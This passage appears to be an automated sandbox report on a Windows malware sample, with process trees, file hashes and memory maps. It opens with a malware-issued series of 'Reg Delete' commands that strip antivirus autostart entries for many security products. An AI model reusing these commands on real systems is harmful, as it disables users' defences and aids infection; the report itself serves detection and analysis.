"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
C:\Users\Admin\AppData\Local\Temp\7F77.exe (depth 1)
  command line: C:\Users\Admin\AppData\Local\Temp\7F77.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\7F77.exe (depth 2)
    command line: C:\Users\Admin\AppData\Local\Temp\7F77.exe
    - Executes dropped EXE
    - Loads dropped DLL

    C:\Windows\SysWOW64\WerFault.exe (depth 3)
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 1472
      - Program crash
      - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\8247.exe (depth 1)
  command line: C:\Users\Admin\AppData\Local\Temp\8247.exe
  - Executes dropped EXE

  C:\Windows\SysWOW64\WerFault.exe (depth 2)
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 732
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WerFault.exe (depth 2)
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 748
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WerFault.exe (depth 2)
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 752
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WerFault.exe (depth 2)
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 880
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\WerFault.exe (depth 2)
    command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1292 -s 856
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\explorer.exe (depth 1)
  command line: C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe (depth 1)
  command line: C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe (depth 1)
  command line: C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe (depth 1)
  command line: C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe (depth 1)
  command line: C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe (depth 1)
  command line: C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe (depth 1)
  command line: C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe (depth 1)
  command line: C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe (depth 1)
  command line: C:\Windows\SysWOW64\explorer.exe
Downloads

C:\ProgramData\Runtimebroker.exe
  MD5 dcebca91a83098af784295a94a03d19d
  SHA1 db334fe85e50fdcf0ccf8901ca7a92f57dffb90a
  SHA256 ec4feafda71d68f300e593568b46efaacb8a46f58ffe691c0cfb4093c0d70be9
  SHA512 38be2ac6cc805bb5f1fc437cf139904382801bea540a6c67d06dca1423bc43c9267d842b937b3adce4820c19151aeeeacbfcc6623183717b5550ecfadfb8db30

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  MD5 6bf0e5945fb9da68e1b03bdaed5f6f8d
  SHA1 eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
  SHA256 dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
  SHA512 977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5 8957a85993bcb1b0c1ff9198768acb25
  SHA1 3b61e404a2b3d3ca507bbc75100a5301bcff4c7c
  SHA256 11d0df3952999565e3083e48a5920e94dc58edafc6521d7c5dfae7e32a80feb7
  SHA512 bc2fbc6d51dc63cfa034d612e2b8dd4d28109284f1aa1b31a5c2974a3ffe4c864532c570931d89c936b4e87e5b24fe2fd38ea265bfe3f96be8d0528fe9a69ff8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (second version of the same path, different content)
  MD5 2d0a27a3f7d7f401004c545023c2b855
  SHA1 99106aaa83d0e623413d9674c004cbe11ce2a5bd
  SHA256 dafb02b2122ac6bc411ef0b18ee3f0ca6efe2c71ab70acbef38f39dc15a7d91f
  SHA512 861dd797a7a3b33b35a3a88ef7f1abd388beee3a6b2405cca5e1d632d21f82d3dea6d146f3c4d9f3d1674daae06006fbaf14c90fc3ef177f95803ff1fe14079f

C:\Users\Admin\AppData\Local\Temp\7DFF.exe (same hashes as C:\ProgramData\Runtimebroker.exe above)
  MD5 dcebca91a83098af784295a94a03d19d
  SHA1 db334fe85e50fdcf0ccf8901ca7a92f57dffb90a
  SHA256 ec4feafda71d68f300e593568b46efaacb8a46f58ffe691c0cfb4093c0d70be9
  SHA512 38be2ac6cc805bb5f1fc437cf139904382801bea540a6c67d06dca1423bc43c9267d842b937b3adce4820c19151aeeeacbfcc6623183717b5550ecfadfb8db30

C:\Users\Admin\AppData\Local\Temp\7F77.exe
  MD5 5707ddada5b7ea6bef434cd294fa12e1
  SHA1 45bb285a597b30e100ed4b15d96a29d718697e5e
  SHA256 85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
  SHA512 91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\7F77.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\7F77.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\8247.exeMD5
172e2eff7900b0a783c33d5f28d65f97
SHA1d7ef3226c3f9166a0337d8a08c7cc839371f076d
SHA2567957f91cad12c3c511f3b4bed3d85cc20f4fa84090271101ad5b1a3178a98b23
SHA512f59b2ad3bb1128c3d7c26639e1d31d50c65d459d50f97e801935f1c51eefd2fe1bae4dde873db12fb8a598fdb499d4676fe9e58e372e992303aef18ca3c4265e
-
C:\Users\Admin\AppData\Local\Temp\8247.exeMD5
172e2eff7900b0a783c33d5f28d65f97
SHA1d7ef3226c3f9166a0337d8a08c7cc839371f076d
SHA2567957f91cad12c3c511f3b4bed3d85cc20f4fa84090271101ad5b1a3178a98b23
SHA512f59b2ad3bb1128c3d7c26639e1d31d50c65d459d50f97e801935f1c51eefd2fe1bae4dde873db12fb8a598fdb499d4676fe9e58e372e992303aef18ca3c4265e
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
memory/8-136-0x0000000000400000-0x0000000002C7D000-memory.dmpFilesize
40.5MB
-
memory/8-127-0x0000000002C80000-0x0000000002DCA000-memory.dmpFilesize
1.3MB
-
memory/8-118-0x0000000000000000-mapping.dmp
-
memory/1116-137-0x0000000002A70000-0x0000000002AE4000-memory.dmpFilesize
464KB
-
memory/1116-135-0x0000000002A00000-0x0000000002A6B000-memory.dmpFilesize
428KB
-
memory/1116-133-0x0000000000000000-mapping.dmp
-
memory/1216-155-0x0000000002F70000-0x0000000002F75000-memory.dmpFilesize
20KB
-
memory/1216-156-0x0000000002F60000-0x0000000002F69000-memory.dmpFilesize
36KB
-
memory/1216-154-0x0000000000000000-mapping.dmp
-
memory/1292-129-0x0000000000000000-mapping.dmp
-
memory/1292-139-0x00000000048B0000-0x0000000004941000-memory.dmpFilesize
580KB
-
memory/1292-140-0x0000000000400000-0x0000000002CA9000-memory.dmpFilesize
40.7MB
-
memory/1300-233-0x0000000000400000-0x0000000000495000-memory.dmpFilesize
596KB
-
memory/1300-220-0x0000000000400000-0x0000000000495000-memory.dmpFilesize
596KB
-
memory/1300-221-0x000000000044003F-mapping.dmp
-
memory/2220-149-0x0000000000000000-mapping.dmp
-
memory/2220-152-0x00000000007E0000-0x00000000007EF000-memory.dmpFilesize
60KB
-
memory/2220-151-0x00000000007F0000-0x00000000007F9000-memory.dmpFilesize
36KB
-
memory/2336-245-0x0000000008DB0000-0x0000000008DE3000-memory.dmpFilesize
204KB
-
memory/2336-453-0x0000000009070000-0x0000000009071000-memory.dmpFilesize
4KB
-
memory/2336-222-0x0000000000000000-mapping.dmp
-
memory/2336-236-0x0000000006982000-0x0000000006983000-memory.dmpFilesize
4KB
-
memory/2336-459-0x0000000009060000-0x0000000009061000-memory.dmpFilesize
4KB
-
memory/2336-252-0x0000000008D90000-0x0000000008D91000-memory.dmpFilesize
4KB
-
memory/2336-235-0x0000000006980000-0x0000000006981000-memory.dmpFilesize
4KB
-
memory/2336-257-0x0000000008F00000-0x0000000008F01000-memory.dmpFilesize
4KB
-
memory/2336-258-0x000000007F5B0000-0x000000007F5B1000-memory.dmpFilesize
4KB
-
memory/2336-259-0x0000000006983000-0x0000000006984000-memory.dmpFilesize
4KB
-
memory/2364-115-0x0000000000402E1A-mapping.dmp
-
memory/2364-114-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/2744-162-0x0000000002BB0000-0x0000000002BB9000-memory.dmpFilesize
36KB
-
memory/2744-160-0x0000000000000000-mapping.dmp
-
memory/2744-161-0x0000000002BC0000-0x0000000002BC4000-memory.dmpFilesize
16KB
-
memory/2884-215-0x0000000009430000-0x0000000009431000-memory.dmpFilesize
4KB
-
memory/2884-207-0x00000000079E0000-0x00000000079E1000-memory.dmpFilesize
4KB
-
memory/2884-219-0x0000000008EB0000-0x000000000900B000-memory.dmpFilesize
1.4MB
-
memory/2884-211-0x0000000004290000-0x0000000004291000-memory.dmpFilesize
4KB
-
memory/2884-194-0x0000000000000000-mapping.dmp
-
memory/2884-212-0x0000000004292000-0x0000000004293000-memory.dmpFilesize
4KB
-
memory/2884-217-0x0000000004293000-0x0000000004294000-memory.dmpFilesize
4KB
-
memory/2892-478-0x0000000000000000-mapping.dmp
-
memory/2984-117-0x00000000010D0000-0x00000000010E6000-memory.dmpFilesize
88KB
-
memory/3004-167-0x00000000032C0000-0x00000000032C5000-memory.dmpFilesize
20KB
-
memory/3004-168-0x00000000032B0000-0x00000000032B9000-memory.dmpFilesize
36KB
-
memory/3004-166-0x0000000000000000-mapping.dmp
-
memory/3088-143-0x0000000000000000-mapping.dmp
-
memory/3088-147-0x0000000002970000-0x0000000002977000-memory.dmpFilesize
28KB
-
memory/3088-148-0x0000000002960000-0x000000000296B000-memory.dmpFilesize
44KB
-
memory/3352-138-0x0000000000000000-mapping.dmp
-
memory/3352-142-0x0000000000DC0000-0x0000000000DCC000-memory.dmpFilesize
48KB
-
memory/3352-141-0x0000000000DD0000-0x0000000000DD7000-memory.dmpFilesize
28KB
-
memory/3400-163-0x0000000000000000-mapping.dmp
-
memory/3400-164-0x00000000001D0000-0x00000000001D5000-memory.dmpFilesize
20KB
-
memory/3400-165-0x00000000001C0000-0x00000000001C9000-memory.dmpFilesize
36KB
-
memory/3544-189-0x0000000009200000-0x0000000009201000-memory.dmpFilesize
4KB
-
memory/3544-172-0x00000000049D0000-0x00000000049D1000-memory.dmpFilesize
4KB
-
memory/3544-178-0x00000000049B0000-0x00000000049B1000-memory.dmpFilesize
4KB
-
memory/3544-195-0x00000000049B3000-0x00000000049B4000-memory.dmpFilesize
4KB
-
memory/3544-177-0x0000000007EE0000-0x0000000007EE1000-memory.dmpFilesize
4KB
-
memory/3544-176-0x0000000007DF0000-0x0000000007DF1000-memory.dmpFilesize
4KB
-
memory/3544-175-0x0000000007AF0000-0x0000000007AF1000-memory.dmpFilesize
4KB
-
memory/3544-174-0x0000000007A50000-0x0000000007A51000-memory.dmpFilesize
4KB
-
memory/3544-173-0x00000000073F0000-0x00000000073F1000-memory.dmpFilesize
4KB
-
memory/3544-188-0x0000000009190000-0x0000000009191000-memory.dmpFilesize
4KB
-
memory/3544-169-0x0000000000000000-mapping.dmp
-
memory/3544-179-0x00000000049B2000-0x00000000049B3000-memory.dmpFilesize
4KB
-
memory/3544-187-0x0000000009510000-0x0000000009511000-memory.dmpFilesize
4KB
-
memory/3544-182-0x00000000084C0000-0x00000000084C1000-memory.dmpFilesize
4KB
-
memory/3544-181-0x00000000086C0000-0x00000000086C1000-memory.dmpFilesize
4KB
-
memory/3544-180-0x0000000007C20000-0x0000000007C21000-memory.dmpFilesize
4KB
-
memory/3592-158-0x0000000000AD0000-0x0000000000AD6000-memory.dmpFilesize
24KB
-
memory/3592-157-0x0000000000000000-mapping.dmp
-
memory/3592-159-0x0000000000AC0000-0x0000000000ACC000-memory.dmpFilesize
48KB
-
memory/3788-116-0x00000000001D0000-0x00000000001DA000-memory.dmpFilesize
40KB
-
memory/3844-150-0x0000000002F00000-0x000000000304A000-memory.dmpFilesize
1.3MB
-
memory/3844-144-0x0000000000000000-mapping.dmp
-
memory/3844-153-0x0000000000400000-0x0000000002C7D000-memory.dmpFilesize
40.5MB
-
memory/4088-134-0x0000000004D10000-0x000000000520E000-memory.dmpFilesize
5.0MB
-
memory/4088-132-0x0000000004D50000-0x0000000004D51000-memory.dmpFilesize
4KB
-
memory/4088-128-0x0000000004DB0000-0x0000000004DB1000-memory.dmpFilesize
4KB
-
memory/4088-126-0x0000000005210000-0x0000000005211000-memory.dmpFilesize
4KB
-
memory/4088-124-0x00000000003B0000-0x00000000003B1000-memory.dmpFilesize
4KB
-
memory/4088-121-0x0000000000000000-mapping.dmp
-
memory/4088-218-0x0000000004EC0000-0x0000000004EE1000-memory.dmpFilesize
132KB